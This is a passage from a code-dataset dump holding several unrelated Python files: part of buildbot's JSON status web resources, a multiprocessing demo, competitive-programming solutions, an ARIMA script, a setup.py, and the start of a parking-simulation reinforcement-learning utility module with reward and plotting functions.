JsonResource.__init__(self, status)\n self.change = change\n\n def asDict(self, request):\n return self.change.asDict()\n\n\nclass ChangesJsonResource(JsonResource):\n help = \"\"\"List of changes.\n\"\"\"\n pageTitle = 'Changes'\n\n def __init__(self, status, changes):\n JsonResource.__init__(self, status)\n for c in changes:\n # c.number can be None or clash another change if the change was\n # generated inside buildbot or if using multiple pollers.\n if c.number is not None and str(c.number) not in self.children:\n self.putChild(str(c.number), ChangeJsonResource(status, c))\n else:\n # Temporary hack since it creates information exposure.\n self.putChild(str(id(c)), ChangeJsonResource(status, c))\n\n def asDict(self, request):\n \"\"\"Don't throw an exception when there is no child.\"\"\"\n if not self.children:\n return {}\n return JsonResource.asDict(self, request)\n\n\nclass ChangeSourcesJsonResource(JsonResource):\n help = \"\"\"Describe a change source.\n\"\"\"\n pageTitle = 'ChangeSources'\n\n def asDict(self, request):\n result = {}\n n = 0\n for c in self.status.getChangeSources():\n # buildbot.changes.changes.ChangeMaster\n change = {}\n change['description'] = c.describe()\n result[n] = change\n n += 1\n return result\n\n\nclass ProjectJsonResource(JsonResource):\n help = \"\"\"Project-wide settings.\n\"\"\"\n pageTitle = 'Project'\n\n def asDict(self, request):\n return self.status.asDict()\n\n\nclass SlaveJsonResource(JsonResource):\n help = \"\"\"Describe a slave.\n\"\"\"\n pageTitle = 'Slave'\n\n def __init__(self, status, slave_status):\n JsonResource.__init__(self, status)\n self.slave_status = slave_status\n self.name = self.slave_status.getName()\n self.builders = None\n\n def getBuilders(self):\n if self.builders is None:\n # Figure out all the builders to which it's attached\n self.builders = []\n for builderName in self.status.getBuilderNames():\n if self.name in self.status.getBuilder(builderName).slavenames:\n self.builders.append(builderName)\n return self.builders\n\n def getSlaveBuildMap(self, buildcache, buildercache):\n for builderName in self.getBuilders():\n if builderName not in buildercache:\n buildercache.add(builderName)\n builder_status = self.status.getBuilder(builderName)\n\n buildnums = range(-1, -(builder_status.buildCacheSize - 1), -1)\n builds = builder_status.getBuilds(buildnums)\n\n for build_status in builds:\n if not build_status or not build_status.isFinished():\n # If not finished, it will appear in runningBuilds.\n break\n slave = buildcache[build_status.getSlavename()]\n slave.setdefault(builderName, []).append(\n build_status.getNumber())\n return buildcache[self.name]\n\n def asDict(self, request):\n if not hasattr(request, 'custom_data'):\n request.custom_data = {}\n if 'buildcache' not in request.custom_data:\n # buildcache is used to cache build information across multiple\n # invocations of SlaveJsonResource. 
It should be set to an empty\n # collections.defaultdict(dict).\n request.custom_data['buildcache'] = collections.defaultdict(dict)\n\n # Tracks which builders have been stored in the buildcache.\n request.custom_data['buildercache'] = set()\n\n results = self.slave_status.asDict()\n # Enhance it by adding more information.\n results['builders'] = self.getSlaveBuildMap(\n request.custom_data['buildcache'],\n request.custom_data['buildercache'])\n return results\n\n\nclass SlavesJsonResource(JsonResource):\n help = \"\"\"List the registered slaves.\n\"\"\"\n pageTitle = 'Slaves'\n\n def __init__(self, status):\n JsonResource.__init__(self, status)\n for slave_name in status.getSlaveNames():\n self.putChild(slave_name,\n SlaveJsonResource(status,\n status.getSlave(slave_name)))\n\n\nclass SourceStampJsonResource(JsonResource):\n help = \"\"\"Describe the sources for a SourceStamp.\n\"\"\"\n pageTitle = 'SourceStamp'\n\n def __init__(self, status, source_stamp):\n # buildbot.sourcestamp.SourceStamp\n JsonResource.__init__(self, status)\n self.source_stamp = source_stamp\n self.putChild('changes',\n ChangesJsonResource(status, source_stamp.changes))\n # TODO(maruel): Should redirect to the patch's url instead.\n #if source_stamp.patch:\n # self.putChild('patch', StaticHTML(source_stamp.path))\n\n def asDict(self, request):\n return self.source_stamp.asDict()\n\nclass MetricsJsonResource(JsonResource):\n help = \"\"\"Master metrics.\n\"\"\"\n title = \"Metrics\"\n\n def asDict(self, request):\n metrics = self.status.getMetrics()\n if metrics:\n return metrics.asDict()\n else:\n # Metrics are disabled\n return None\n\n\n\nclass JsonStatusResource(JsonResource):\n \"\"\"Retrieves all json data.\"\"\"\n help = \"\"\"JSON status\n\nRoot page to give a fair amount of information in the current buildbot master\nstatus. 
You may want to use a child instead to reduce the load on the server.\n\nFor help on any sub directory, use url /child/help\n\"\"\"\n pageTitle = 'Buildbot JSON'\n\n def __init__(self, status):\n JsonResource.__init__(self, status)\n self.level = 1\n self.putChild('builders', BuildersJsonResource(status))\n self.putChild('change_sources', ChangeSourcesJsonResource(status))\n self.putChild('project', ProjectJsonResource(status))\n self.putChild('slaves', SlavesJsonResource(status))\n self.putChild('metrics', MetricsJsonResource(status))\n # This needs to be called before the first HelpResource().body call.\n self.hackExamples()\n\n def content(self, request):\n result = JsonResource.content(self, request)\n # This is done to hook the downloaded filename.\n request.path = 'buildbot'\n return result\n\n def hackExamples(self):\n global EXAMPLES\n # Find the first builder with a previous build or select the last one.\n builder = None\n for b in self.status.getBuilderNames():\n builder = self.status.getBuilder(b)\n if builder.getBuild(-1):\n break\n if not builder:\n return\n EXAMPLES = EXAMPLES.replace('', builder.getName())\n build = builder.getBuild(-1)\n if build:\n EXAMPLES = EXAMPLES.replace('', str(build.getNumber()))\n if builder.slavenames:\n EXAMPLES = EXAMPLES.replace('', builder.slavenames[0])\n\n# vim: set ts=4 sts=4 sw=4 et:\n","repo_name":"houseoflifeproperty/bitpop","sub_path":"build/third_party/buildbot_8_4p1/buildbot/status/web/status_json.py","file_name":"status_json.py","file_ext":"py","file_size_in_byte":27016,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"29585326781","text":"import multiprocessing\nimport math\nimport logging\nimport datetime\nfrom multiprocessing.pool import Pool\n\nlogging.basicConfig(\n format=\"%(asctime)s - %(name)s - [%(filename)s:%(lineno)d] - %(levelname)s - %(message)s\",\n datefmt=\"%Y-%m-%d %I:%M:%S %p\",\n level=logging.INFO,\n)\nlogger = logging.getLogger(__name__)\n\n\ndef sqrt_even_numbers(limit: int):\n for n in range(1, limit + 1):\n if n % 2 == 0:\n # math.sqrt(n)\n # print(f\"number: {n}, square root: {math.sqrt(n)}\")\n logger.info(\"number: %s, square root: %s\", n, math.sqrt(n))\n\n\ndef main():\n # sqrt_even_numbers(10)\n print(\"Starting multiprocessing now...\")\n\n t0 = datetime.datetime.now()\n # create pool of processors to use\n pool = Pool(processes=multiprocessing.cpu_count())\n\n # send computation task to different processors in the pool\n pool.apply_async(func=sqrt_even_numbers, args=(100000,))\n pool.apply_async(func=sqrt_even_numbers, args=(200000,))\n pool.apply_async(func=sqrt_even_numbers, args=(300000,))\n pool.apply_async(func=sqrt_even_numbers, args=(400000,))\n\n # close the pool\n pool.close()\n\n # wait for the tasks to complete\n pool.join()\n\n dt = datetime.datetime.now() - t0\n\n print(f\"Total time taken in seconds: {dt.total_seconds():,.2f}\")\n\n\nif __name__ == \"__main__\":\n # sqrt_even_numbers()\n main()\n","repo_name":"andy-ifeanyi/concurrency_pattern_python","sub_path":"multiprocessing/basic_multiprocessing.py","file_name":"basic_multiprocessing.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8735012946","text":"#problem 34 / find first and last position of element in sorted array\nclass Solution(object):\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n 
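# Two binary searches: the first returns the leftmost index holding target\n        # (or its insertion point); the second returns the first index past the last\n        # occurrence, hence the -1 for the right bound below.\n        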
leftidx = self.binarysearch(nums,target,True)\n if leftidx == len(nums) or nums[leftidx] != target:\n return [-1,-1]\n return [leftidx,self.binarysearch(nums,target,False)-1]\n \n def binarysearch(self,nums,target,ifleft):\n lo = 0\n hi = len(nums)\n while lo < hi:\n mid = (lo+hi)/2\n if nums[mid] > target or (ifleft and target == nums[mid]):\n hi = mid\n else:\n lo = mid+1\n return lo","repo_name":"digitalladder/leetcode","sub_path":"problem34.py","file_name":"problem34.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32566416879","text":"import threading\nfrom multiprocessing.pool import ThreadPool\n\nfrom pyhtmlgui import Observable\n\nfrom app.devices.devices import DevicesInstance\nfrom app.files.shots import ShotsInstance\n\n\nclass Task_SyncShots(Observable):\n def __init__(self):\n super().__init__()\n self.name = \"Sync Shots\"\n self.status = \"idle\"\n self.worker = None\n\n def set_status(self, value):\n self.status = value\n self.notify_observers()\n\n def run(self):\n if self.worker is None:\n self.worker = threading.Thread(target=self._run, daemon=True)\n self.worker.start()\n\n def _run(self):\n if self.status != \"idle\":\n return\n self.set_status(\"list\")\n cameras = DevicesInstance().cameras.list()\n\n cameras = [c for c in cameras if c.status == \"online\"]\n with ThreadPool(20) as p:\n p.map(lambda device: device.camera.shots._refresh_list(), cameras)\n\n self.set_status(\"shots\")\n with ThreadPool(5) as p:\n p.map(lambda shot: shot._sync_remote(), ShotsInstance().shots)\n\n self.set_status(\"idle\")\n self.worker = None\n\n \n_taskSyncShotsInstance = None\n\n\ndef TaskSyncShotsInstance():\n global _taskSyncShotsInstance\n if _taskSyncShotsInstance is None:\n _taskSyncShotsInstance = Task_SyncShots()\n return _taskSyncShotsInstance\n","repo_name":"dirk-makerhafen/openpi3dscan","sub_path":"server/app/tasks/task_SyncShots.py","file_name":"task_SyncShots.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34435636101","text":"# uninhm\n# https://atcoder.jp/contests/abc089/tasks/abc089_c\n# combinatorics, semi-brute force\n\nfrom collections import Counter\n\nn = int(input())\ns = [input() for _ in range(n)]\n\nc = Counter()\n\nfor name in s:\n c[name[0]] += 1\n\nmarch = 'MARCH'\n\nans = 0\nfor i in range(len(march)):\n for j in range(i+1, len(march)):\n for k in range(j+1, len(march)):\n ans += c[march[i]] * c[march[j]] * c[march[k]]\n\nprint(ans)\n","repo_name":"Vicfred/kyopro","sub_path":"atcoder/abc089C_march.py","file_name":"abc089C_march.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"72"} +{"seq_id":"3716121238","text":"'''\r\n\tArima model\r\n\thttps://machinelearningmastery.com/arima-for-time-series-forecasting-with-python/\r\n'''\r\nfrom pandas import read_csv\r\nfrom pandas import datetime\r\nfrom pandas import DataFrame\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nfrom matplotlib import pyplot\r\nimport numpy as np \r\n\r\ndef parser(x):\r\n#\treturn datetime.strptime(str(x), '%Y%m.0')\r\n\treturn datetime.strptime(str(x), '%m')\r\n\r\nseries = read_csv(\r\n#\t'/home/evanb/output/data-randomforest2.txt', \r\n\t'/home/evanb/datasets/onedist.csv',\r\n\theader=0, \r\n\tparse_dates=[11], \r\n\t#index_col=0, \r\n\tsqueeze=True, 
\r\n\tdate_parser=parser,\r\n\tlow_memory=False\r\n)\r\nprint(series)\r\n# fit model\r\nmodel = ARIMA(np.asarray(series), order=(3,1,0))\r\nmodel_fit = model.fit(disp=0)\r\nprint(model_fit.summary())\r\n# plot residual errors\r\nresiduals = DataFrame(model_fit.resid)\r\nresiduals.plot()\r\npyplot.show()\r\nresiduals.plot(kind='kde')\r\npyplot.show()\r\nprint(residuals.describe())\r\n\r\n","repo_name":"ebradham/mlcode","sub_path":"arima.py","file_name":"arima.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26334362070","text":"import sys\n\ndef isPrime(number): \n counter = 0\n for i in range(number + 1):\n if i == 0:\n continue\n if number % i == 0:\n counter += 1\n \n if counter == 2:\n print(True)\n else: \n print(False)\n\nif __name__ == \"__main__\":\n isPrime(int(sys.argv[1]))\n","repo_name":"tam2628/linear_regression","sub_path":"checkprime.py","file_name":"checkprime.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1997020156","text":"from setuptools import setup, find_packages\nfrom MineRL.globals import VERSION\n\n\nextras = {}\ntest_deps = ['pytest']\n\nall_deps = []\nfor group_name in extras:\n all_deps += extras[group_name]\nall_deps = all_deps + test_deps\nextras['all'] = all_deps\n\n\nsetup(\n name='MineRL',\n version=VERSION,\n author='heron',\n author_email='wyatt.lansford@heronsystems.com',\n description='Minecraft Offline Learning Env',\n long_description='',\n long_description_content_type=\"text/markdown\",\n url='https://github.com/wyattlansford/MineRL',\n license='Closed',\n python_requires='>=3.6.0',\n packages=find_packages(),\n install_requires=[\n ],\n test_requires=test_deps,\n extras_require=extras,\n include_package_data=True\n)","repo_name":"wyattlansford/MineRL","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12668710329","text":"import csv\nimport json\nimport os\nimport re\nfrom glob import glob\nfrom pathlib import Path\nfrom typing import List, Dict\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom cmcrameri import cm\nfrom zipfile import BadZipFile\n\nsns.set_style(\"dark\")\nsns.set_context(\"paper\")\n\nX_LABEL = [\n f\"{int(x)}:00 AM\" if x < 12 else f\"{int(x - [12 if x != 12 else 0])}:00 PM\"\n for x in np.arange(8, 22, 2)\n]\n\n\ndef add_bool_arg(parser, name, default=False):\n \"\"\"\n Adds boolean arguments to parser by registering both the positive argument and the \"no\"-argument.\n :param parser:\n :param name: Name of argument.\n :param default:\n :return:\n \"\"\"\n group = parser.add_mutually_exclusive_group(required=False)\n group.add_argument(\"--\" + name, dest=name, action=\"store_true\")\n group.add_argument(\"--no-\" + name, dest=name, action=\"store_false\")\n parser.set_defaults(**{name: default})\n\n\ndef occupancy_reward_function(\n colours: List[str], current_state: Dict[str, float], global_mode=False\n):\n \"\"\"\n Rewards occupancy rates between 75% and 90%. 
Punishes deviations exponentially.\n :param current_state: State dictionary.\n :param colours: Colours of different CPZs.\n :param global_mode: Whether or not to use the global occupancies or the one of the individual CPZs.\n :return: reward\n \"\"\"\n reward = 0\n if global_mode:\n cpz_occupancies = [current_state[\"overall_occupancy\"]]\n else:\n cpz_occupancies = [current_state[f\"{c}-lot occupancy\"] for c in colours]\n\n for val in cpz_occupancies:\n if 0.75 < val < 0.9:\n reward += 1\n elif val <= 0.75:\n value = 1 - (abs(val - 0.825) / 0.825) ** -1.2\n min_value = 1 - (abs(0 - 0.825) / 0.825) ** -1.2\n max_value = 1 - (abs(0.75 - 0.825) / 0.825) ** -1.2\n max_distance = max_value - min_value\n actual_distance = value - min_value\n reward += actual_distance / max_distance\n elif val >= 0.9:\n value = 1 - (abs(val - 0.825) / 0.825) ** -1.2\n min_value = 1 - (abs(1 - 0.825) / 0.825) ** -1.2\n max_value = 1 - (abs(0.9 - 0.825) / 0.825) ** -1.2\n max_distance = max_value - min_value\n actual_distance = value - min_value\n reward += actual_distance / max_distance\n return reward / len(cpz_occupancies)\n\n\ndef n_cars_reward_function(colours: List[str], current_state: Dict[str, float]):\n \"\"\"\n Minimizes the number of cars in the simulation.\n :param colours: Colours of different CPZs (only present to be able to use one call in custom_environment.py).\n :param current_state:State dictionary.\n :return: reward\n \"\"\"\n return optimize_attr(current_state, \"n_cars\", mode=\"min\")\n\n\ndef social_reward_function(colours: List[str], current_state: Dict[str, float]):\n \"\"\"\n Maximizes the normalized share of poor cars in the model.\n :param colours: Colours of different CPZs (only present to be able to use one call in custom_environment.py).\n :param current_state:State dictionary.\n :return: reward\n \"\"\"\n return optimize_attr(current_state, \"normalized_share_low\")\n\n\ndef speed_reward_function(colours: List[str], current_state: Dict[str, float]):\n \"\"\"\n Maximizes the average speed of the turtles in the model.\n :param colours: Colours of different CPZs (only present to be able to use one call in custom_environment.py).\n :param current_state:State dictionary.\n :return: reward\n \"\"\"\n return optimize_attr(current_state, \"mean_speed\")\n\n\ndef composite_reward_function(colours: List[str], current_state: Dict[str, float]):\n \"\"\"\n Maximizes 1/2 occupancy_reward_function + 1/4 n_cars_reward_function + 1/4 social_reward_function\n :param colours: Colours of different CPZs (only present to be able to use one call in custom_environment.py).\n :param current_state:State dictionary.\n :return: reward\n \"\"\"\n return (\n 0.5 * occupancy_reward_function(colours, current_state, global_mode=True)\n + 0.25 * n_cars_reward_function(colours, current_state)\n + 0.25 * social_reward_function(colours, current_state)\n )\n\n\ndef optimize_attr(current_state: Dict[str, float], attr: str, mode=\"max\"):\n \"\"\"\n Abstract function to optimize attributes.\n :param mode: either \"min\" or \"max\" (default).\n :param current_state: State dictionary.\n :param attr: Attribute in state dictionary to optimize.\n :return: reward-value\n \"\"\"\n if mode == \"min\":\n return abs(current_state[attr] - 1) ** 2\n else:\n return current_state[attr] ** 2\n\n\ndef document_episode(nl, path: Path, reward_sum):\n \"\"\"\n Create directory for current episode and command NetLogo to save model as csv.\n :param nl: NetLogo-Session of environment.\n :param path: Path of current episode.\n :param 
reward_sum: Sum of accumulated rewards for episode.\n :return:\n \"\"\"\n path.mkdir(parents=True, exist_ok=True)\n # Get all directories to check which episode this is\n dirs = glob(str(path) + \"/E*.pkl\")\n current_episode = 1\n if dirs:\n last_episode = max(\n [int(re.findall(\"E(\\d+)\", dirs[i])[0]) for i in range(len(dirs))]\n )\n current_episode = last_episode + 1\n episode_path = str(path / f\"E{current_episode}_{np.around(reward_sum, 8)}\").replace(\n \"\\\\\", \"/\"\n )\n\n nl.command(f'export-world \"{episode_path}.csv\"')\n nl.command(f'export-view \"{episode_path}.png\"')\n\n # Save relevant data as pickle to save storage\n df = get_data_from_run(f\"{episode_path}.csv\")\n df.to_pickle(f\"{episode_path}.pkl\", compression=\"zip\")\n\n # Delete csv\n os.remove(f\"{episode_path}.csv\")\n\n\ndef label_episodes(path: Path, df: pd.DataFrame, mode: str):\n \"\"\"\n Identifies worst, median and best episode of run. Renames them and saves plots.\n :param path: Path of current Experiment.\n :param df: DataFrame containing the results.\n :param mode: Usually either \"training\" or \"evaluation\".\n :return:\n \"\"\"\n episode_files = glob(str(path) + \"/E*.pkl\")\n performances = dict()\n performances[\"max\"] = np.around(df.rewards.max(), 8)\n performances[\"min\"] = np.around(df.rewards.min(), 8)\n performances[\"median\"] = np.around(\n df.rewards.sort_values(ignore_index=True)[np.ceil(len(df) / 2) - 1], 8\n )\n\n print(f\"Performances for {mode}:\")\n print(performances)\n\n for metric in performances.keys():\n if performances[metric] == 0.0:\n performances[metric] = 0\n found = False\n for episode in episode_files:\n # Baseline\n if mode not in [\"training\", \"eval\"]:\n if str(performances[metric]) == episode.split(\"_\")[-1].split(\".pkl\")[0]:\n found = True\n elif str(performances[metric]) in episode:\n found = True\n if found:\n new_path = path / mode / metric\n new_path.mkdir(parents=True, exist_ok=True)\n save_plots(new_path, episode)\n os.rename(\n episode,\n str(new_path / f\"{mode}_{metric}_{performances[metric]}.pkl\"),\n )\n os.rename(\n episode.replace(\"pkl\", \"png\"),\n str(new_path / f\"view_{mode}_{metric}_{performances[metric]}.png\"),\n )\n episode_files.remove(episode)\n break\n\n\ndef delete_unused_episodes(path: Path):\n \"\"\"\n Deletes episodes that did not produce either min, median or max performances to save storage.\n :param path: Path of current Experiment\n :return:\n \"\"\"\n # Get all episodes not moved due to being min, median or max\n episode_files = glob(str(path) + \"/E*\")\n\n # Remove files of episodes\n for file in episode_files:\n if os.path.isfile(file) and \"eval\" not in file:\n os.remove(file)\n\n print(\"Unused Files deleted!\")\n\n\ndef save_plots(outpath: Path, episode_path: str):\n \"\"\"\n Calls all plot functions for given episode.\n :param outpath: Path to save plots.\n :param episode_path: Path of current episode.\n :return:\n \"\"\"\n try:\n data_df = pd.read_pickle(episode_path, compression=\"zip\")\n except FileNotFoundError:\n data_df = get_data_from_run(episode_path)\n\n for func in [\n plot_fees,\n plot_occup,\n plot_social,\n plot_n_cars,\n plot_speed,\n plot_income_stats,\n plot_share_yellow,\n plot_share_parked,\n plot_share_vanished,\n ]:\n func(data_df, outpath)\n\n\ndef get_data_from_run(episode_path):\n \"\"\"\n Extracts data for plots from episode.csv saved by NetLogo.\n :param episode_path: Path of current episode.\n :return: DataFrame with data of current episode.\n \"\"\"\n # Open JSON file containing the 
indexing information required to extract the information needed for plotting\n with open(\"df_index.json\", \"r\") as fp:\n INDEX_DICT = json.load(fp=fp)\n\n with open(episode_path, newline=\"\") as csvfile:\n file_reader = csv.reader(csvfile, delimiter=\",\", quotechar='\"')\n for i, row in enumerate(file_reader):\n for key in INDEX_DICT.keys():\n if INDEX_DICT[key][\"title\"] in row:\n INDEX_DICT[key][\"i\"] = i\n\n data_df = pd.read_csv(\n episode_path, skiprows=INDEX_DICT[\"fee\"][\"i\"] + 11, nrows=21601\n )\n data_df = data_df.rename(\n columns={\n \"y\": \"yellow_lot_fee\",\n \"y.1\": \"teal_lot_fee\",\n \"y.2\": \"green_lot_fee\",\n \"y.3\": \"blue_lot_fee\",\n }\n )\n data_df = data_df[\n [\"x\", \"yellow_lot_fee\", \"green_lot_fee\", \"teal_lot_fee\", \"blue_lot_fee\"]\n ]\n data_df.x = data_df.x / 1800\n del INDEX_DICT[\"fee\"]\n\n i = 0\n # Catch exceptions for different versions of NetLogo model run\n while i < len(INDEX_DICT.keys()):\n key = sorted(INDEX_DICT)[i]\n try:\n temp_df = pd.read_csv(\n episode_path,\n skiprows=INDEX_DICT[key][\"i\"] + INDEX_DICT[key][\"offset\"],\n nrows=21601,\n )\n for j, col in enumerate(INDEX_DICT[key][\"cols\"]):\n temp_df = temp_df.rename(columns={f\"y.{j}\" if j > 0 else \"y\": col})\n temp_df = temp_df[INDEX_DICT[key][\"cols\"]]\n data_df = data_df.join(temp_df)\n i += 1\n except KeyError:\n INDEX_DICT[key][\"offset\"] += 1\n\n return data_df\n\n\ndef plot_fees(data_df, outpath):\n \"\"\"\n Plot fees for CPZs over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n color_list = [\n cm.imola_r(0),\n cm.imola_r(1.0 * 1 / 3),\n cm.imola_r(1.0 * 2 / 3),\n cm.imola_r(1.0),\n ]\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n ax.plot(\n data_df.x,\n data_df.yellow_lot_fee,\n linewidth=4,\n color=color_list[0],\n linestyle=\"solid\",\n )\n ax.plot(\n data_df.x,\n data_df.green_lot_fee,\n linewidth=4,\n color=color_list[1],\n linestyle=\"dashed\",\n )\n ax.plot(\n data_df.x,\n data_df.teal_lot_fee,\n linewidth=4,\n color=color_list[2],\n linestyle=\"dashed\",\n )\n ax.plot(\n data_df.x,\n data_df.blue_lot_fee,\n linewidth=4,\n color=color_list[3],\n linestyle=\"dashed\",\n )\n\n ax.set_ylim(bottom=0, top=10.1)\n\n ax.set_ylabel(\"Hourly Fee in €\", fontsize=30)\n ax.set_xlabel(\"\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n\n create_colourbar(fig)\n fig.savefig(str(outpath / \"fees.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_occup(data_df, outpath):\n \"\"\"\n Plot occupation levels of different CPZs over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n\n color_list = [\n cm.imola_r(0),\n cm.imola_r(1.0 * 1 / 3),\n cm.imola_r(1.0 * 2 / 3),\n cm.imola_r(1.0),\n ]\n ax.plot(\n data_df.x, data_df.yellow_lot_occup / 100, linewidth=2, color=color_list[0]\n )\n ax.plot(\n data_df.x, data_df.green_lot_occup / 100, linewidth=2, color=color_list[1]\n )\n ax.plot(\n data_df.x, data_df.teal_lot_occup / 100, linewidth=2, color=color_list[2]\n )\n ax.plot(\n data_df.x, data_df.blue_lot_occup / 100, linewidth=2, 
color=color_list[3]\n )\n ax.plot(\n data_df.x,\n data_df.garages_occup / 100,\n label=\"Garage(s)\",\n linewidth=2,\n color=\"black\",\n )\n ax.plot(\n data_df.x,\n data_df.overall_occup / 100,\n label=\"Kerbside Parking Overall\",\n linewidth=4,\n color=cm.berlin(1.0),\n linestyle=(0, (1, 5)),\n ) if \"composite\" in str(outpath).lower() else None\n ax.plot(\n data_df.x,\n [0.75] * len(data_df.x),\n linewidth=2,\n color=\"red\",\n linestyle=\"dashed\",\n )\n ax.plot(\n data_df.x,\n [0.90] * len(data_df.x),\n linewidth=2,\n color=\"red\",\n linestyle=\"dashed\",\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Utilised Capacity\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n create_colourbar(fig)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"occupancy_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_social(data_df, outpath):\n \"\"\"\n PLot shares of different income classes over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.bamako(0), cm.bamako(1.0 * 1 / 2), cm.bamako(1.0)]\n ax.plot(\n data_df.x,\n data_df.low_income / 100,\n label=\"Low Income\",\n linewidth=3,\n color=color_list[0],\n )\n ax.plot(\n data_df.x,\n data_df.middle_income / 100,\n label=\"Middle Income\",\n linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df.high_income / 100,\n label=\"High Income\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Share of Cars per Income Class\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"social_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_speed(data_df, outpath):\n \"\"\"\n Plot average speed over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n ax.plot(data_df.x, data_df.average_speed, linewidth=3, color=cm.bamako(0))\n ax.plot(\n data_df.x,\n data_df.average_speed.rolling(50).mean(),\n linewidth=3,\n color=cm.bamako(1.0),\n )\n\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Average Normalised Speed\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n\n fig.savefig(str(outpath / \"speed.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_n_cars(data_df, outpath):\n \"\"\"\n Plot number of cars over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n ax.plot(data_df.x, data_df.cars_overall / 100, linewidth=3, color=cm.bamako(0))\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Share of 
Initially Spawned Cars\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n\n fig.savefig(str(outpath / \"n_cars.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_income_stats(data_df, outpath):\n \"\"\"\n Plot mean, median and std. of income distribution of run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.berlin(0), cm.berlin(1.0 * 1 / 2), cm.berlin(1.0)]\n ax.plot(\n data_df.x, data_df[\"mean\"], label=\"Mean\", linewidth=3, color=color_list[0]\n )\n ax.plot(\n data_df.x,\n data_df[\"median\"],\n label=\"Median\",\n linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df[\"std\"],\n label=\"Standard Deviation\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=max(data_df[[\"mean\", \"median\", \"std\"]].max()) + 1)\n\n ax.set_ylabel(\"Income in €\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n 